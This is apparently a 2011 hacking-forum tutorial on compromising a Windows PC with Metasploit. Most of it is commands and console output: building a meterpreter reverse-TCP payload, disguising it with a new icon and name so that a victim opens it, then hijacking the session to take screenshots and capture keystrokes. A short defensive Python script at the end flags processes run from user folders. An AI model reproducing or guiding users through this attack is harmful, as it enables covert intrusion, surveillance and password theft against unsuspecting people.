Hey, I'm going to show you step by step how to get into a Windows system easily. I used Backtrack 4 in this situation, but you can also use Windows if you want to. What we are going to use is Metasploit and Nmap. Just follow the steps.
Download Metasploit from this site http://www.metasploit.com/download/; you can use it on Windows or Linux.
Install the program.
If it is only a local network, use your local IP address; if it is over the internet, use your WAN IP address, which you can see at http://www.whatismyip.com/
Start a terminal/shell on Backtrack.
Code:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.113.201.34 LPORT=4444 x > /root/Payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=10.113.201.34,LPORT=4444
root@bt:~#
If you made the payload right, it will look like this; if it doesn't show like this, you did it wrong. The payload.exe file will be on your desktop.
I suggest, if you can, downloading Icon Changer 3.8 and changing the icon and naming it something more interesting; then you can easily make somebody open the file.
Download Icon Changer 3.8 here: http://www.shelllabs.com/iconchanger_download.htm
Start Metasploit, and choose your exploit and PAYLOAD. Do it like above.
Code:
root@bt:~# msfconsole
__
< metasploit >
--
,__,
(oo)____
(__) )
||--|| *
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9959 updated 241 days ago (2010.08.05)
Warning: This copy of the Metasploit Framework was last updated 241 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >
See which options you have.
Code:
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
We are going to use our local IP address this time. Do that by opening a new terminal/shell.
Code:
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:32:56:46
inet addr:10.113.201.34 Bcast:10.113.201.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5370 (5.3 KB) TX bytes:1152 (1.1 KB)
Interrupt:19 Base address:0x2000
Let's start by inserting our IP and port. Let's get back to Metasploit.
Code:
msf exploit(handler) > set LHOST 10.113.201.34
LHOST => 10.113.201.34
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
Make someone open the payload.exe. I recommend downloading Icon Changer 3.8 and changing the payload.exe icon and renaming it, and then you can send it to somebody. After they open the file, it will look like this.
Code:
[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 10.113.201.59
[*] Meterpreter session 1 opened (10.113.201.34:4444 -> 10.113.201.59:7293) at 2011-04-03 22:44:14 -0200
meterpreter >
We are going to migrate to explorer.exe now. Type ps to see the target's services.
Code:
meterpreter > ps
Process list
============

 PID   Name                          Arch  Session  User             Path
 ---   ----                          ----  -------  ----             ----
 0     [System Process]
 4     System
 356   smss.exe
 444   csrss.exe
 508   wininit.exe
 520   csrss.exe
 556   services.exe
 572   lsass.exe
 580   lsm.exe
 704   svchost.exe
 768   nvvsvc.exe
 808   svchost.exe
 868   svchost.exe
 900   svchost.exe
 928   svchost.exe
 1068  svchost.exe
 1144  DisplayLinkManager.exe
 1176  winlogon.exe
 1316  Smc.exe
 1400  nvvsvc.exe
 1476  svchost.exe
 1548  ccSvcHst.exe
 1708  spoolsv.exe
 1720  DisplayLinkUserAgent.exe
 1752  svchost.exe
 1992  svchost.exe
 2040  IPROSetMonitor.exe
 464   LVPrcSrv.exe
 408   mdm.exe
 940   svchost.exe
 1140  Rtvscan.exe
 1448  TeamViewer_Service.exe
 2068  UltiDevCassinWebServer2a.exe
 2144  vmware-usbarbitrator.exe
 2268  vmnat.exe
 2324  vmnetdhcp.exe
 2360  vmware-authd.exe
 2848  svchost.exe
 2916  svchost.exe
 3460  taskhost.exe                  x86   1        SERMERSOOQ\ilin  C:\Windows\system32\taskhost.exe
 3528  dwm.exe                       x86   1        SERMERSOOQ\ilin  C:\Windows\system32\Dwm.exe
 3580  explorer.exe                  x86   1        SERMERSOOQ\ilin  C:\Windows\Explorer.EXE
 3740  DisplayLinkUI.exe             x86   1        SERMERSOOQ\ilin  C:\Program Files\DisplayLink Core Software\DisplayLinkUI.exe
 4080  hqtray.exe                    x86   1        SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\hqtray.exe
 2304  SmcGui.exe                    x86   1
 2084  AdobeARM.exe                  x86   1        SERMERSOOQ\ilin  C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
 2336  ccApp.exe                     x86   1        SERMERSOOQ\ilin  C:\Program Files\Common Files\Symantec Shared\ccApp.exe
 2000  LWS.exe                       x86   1        SERMERSOOQ\ilin  C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
 3832  PWRISOVM.EXE                  x86   1        SERMERSOOQ\ilin  C:\Program Files\PowerISO\PWRISOVM.EXE
 4004  PrintScreen.exe               x86   1        SERMERSOOQ\ilin  C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
 1952  PRTG Windows GUI.exe          x86   1        SERMERSOOQ\ilin  C:\Program Files\PRTG Network Monitor\PRTG Windows GUI.exe
 1936  CUCore.exe                    x86   1        SERMERSOOQ\ilin  C:\Users\ilin\AppData\Local\Radvision\Conference Client\7.10.1.169\cucore.exe
 2540  COCIManager.exe               x86   1        SERMERSOOQ\ilin  C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
 4784  SearchIndexer.exe
 2964  msnmsgr.exe                   x86   1        SERMERSOOQ\ilin  C:\Program Files\Windows Live\Messenger\msnmsgr.exe
 6028  wlcomm.exe                    x86   1        SERMERSOOQ\ilin  C:\Program Files\Windows Live\Contacts\wlcomm.exe
 5944  vmplayer.exe                  x86   1        SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\vmplayer.exe
 5096  firefox.exe                   x86   1        SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\firefox.exe
 448   plugin-container.exe          x86   1        SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\plugin-container.exe
 4488  vmware-vmx.exe
 5200  Payload.exe                   x86   1        SERMERSOOQ\ilin  C:\Users\ilin\Desktop\Payload.exe
 5696  notepad.exe                   x86   1        SERMERSOOQ\ilin  C:\Windows\system32\notepad.exe
meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >
I typed use priv to open hashdump or other things.
Code:
meterpreter > use priv
Loading extension priv...success.
Type sysinfo to see which system it is. Is it helpful?
Code:
meterpreter > sysinfo
Computer: NUUMOB0088
OS : Windows 7 (Build 7600, ).
Arch : x86
Language: da_DK
meterpreter >
Take a screenshot of the target's desktop; remember that after you make the screenshot, the file is on your desktop.
Code:
meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner-1.9.0.15/libxul.so: undefined symbol: sqlite3_enable_shared_cache
meterpreter >
You can scan/listen to whatever the target types, with this.
Code:
meterpreter > keyscan_dump
Dumping captured keystrokes...
<LWin> rnotepad <Return> my password it Hahahahaha <Alt> <LMenu> <Tab>
meterpreter >
I have another thread if you don't want to wait for the host; there you can just type the target's IP and port. My tutorial's link is here http://www.hackforums.net/showthread.php?tid=1181486
Enjoy it!
Rate this and make comments.
Is it too difficult to understand? If it is, I think I can make it more understandable ;D
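As an added defender-side example (not part of the original post), here is a small Python triage of a meterpreter-style `ps` listing in the layout shown above: it parses the rows and flags any process whose image runs from a user-writable folder such as a Desktop, which is exactly how Payload.exe stands out in the listing. The sample rows are constructed from the post's output with the stripped backslashes restored; the trusted-prefix list assumes a 32-bit Windows 7 host like the one in the post.

```python
import re
from typing import NamedTuple
class Proc(NamedTuple):
    pid: int
    name: str
    path: str  # empty when the listing shows no path for the process

# Constructed sample in the post's `ps` layout (stripped backslashes restored).
SAMPLE_PS = """\
PID   Name          Arch  Session  User             Path
---   ----          ----  -------  ----             ----
4     System
556   services.exe
3580  explorer.exe  x86   1        SERMERSOOQ\\ilin  C:\\Windows\\Explorer.EXE
5096  firefox.exe   x86   1        SERMERSOOQ\\ilin  C:\\Program Files\\Mozilla Firefox\\firefox.exe
5200  Payload.exe   x86   1        SERMERSOOQ\\ilin  C:\\Users\\ilin\\Desktop\\Payload.exe
5696  notepad.exe   x86   1        SERMERSOOQ\\ilin  C:\\Windows\\system32\\notepad.exe
"""
# PID, name (may contain spaces), then optionally arch, session, user, path.
ROW_RE = re.compile(r"^(\d+)\s+(.+?)(?:\s+(?:x86|x64)\s+\d+\s+\S+\s+(\S:.*))?\s*$")
# Where installed software normally lives on a 32-bit Windows 7 host (assumption).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\")
# Folders any user can write to; a new .exe here is worth a closer look.
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\", "\\temp\\")

def parse_ps(text):
    """Turn a meterpreter-style `ps` listing into Proc records."""
    procs = []
    for line in text.splitlines():
        m = ROW_RE.match(line.rstrip())
        if m:  # header, separator and blank lines do not start with a PID
            procs.append(Proc(int(m.group(1)), m.group(2).strip(), m.group(3) or ""))
    return procs

def flag_suspicious(procs):
    """Return (proc, reason) for images running outside trusted install dirs."""
    findings = []
    for p in procs:
        path = p.path.lower()
        if not path or path.startswith(TRUSTED_PREFIXES):
            continue  # no path visible, or a normal install location
        reason = "image outside Windows/Program Files"
        if any(mark in path for mark in USER_WRITABLE):
            reason = "image in user-writable folder"
        findings.append((p, reason))
    return findings

if __name__ == "__main__":
    for proc, why in flag_suspicious(parse_ps(SAMPLE_PS)):
        print(f"PID {proc.pid} {proc.name}: {why} ({proc.path})")
```

Processes with no path column (kernel, services and other-session processes in the listing) are left unjudged here, so a real triage would pair this with the session/user columns rather than trusting the path alone.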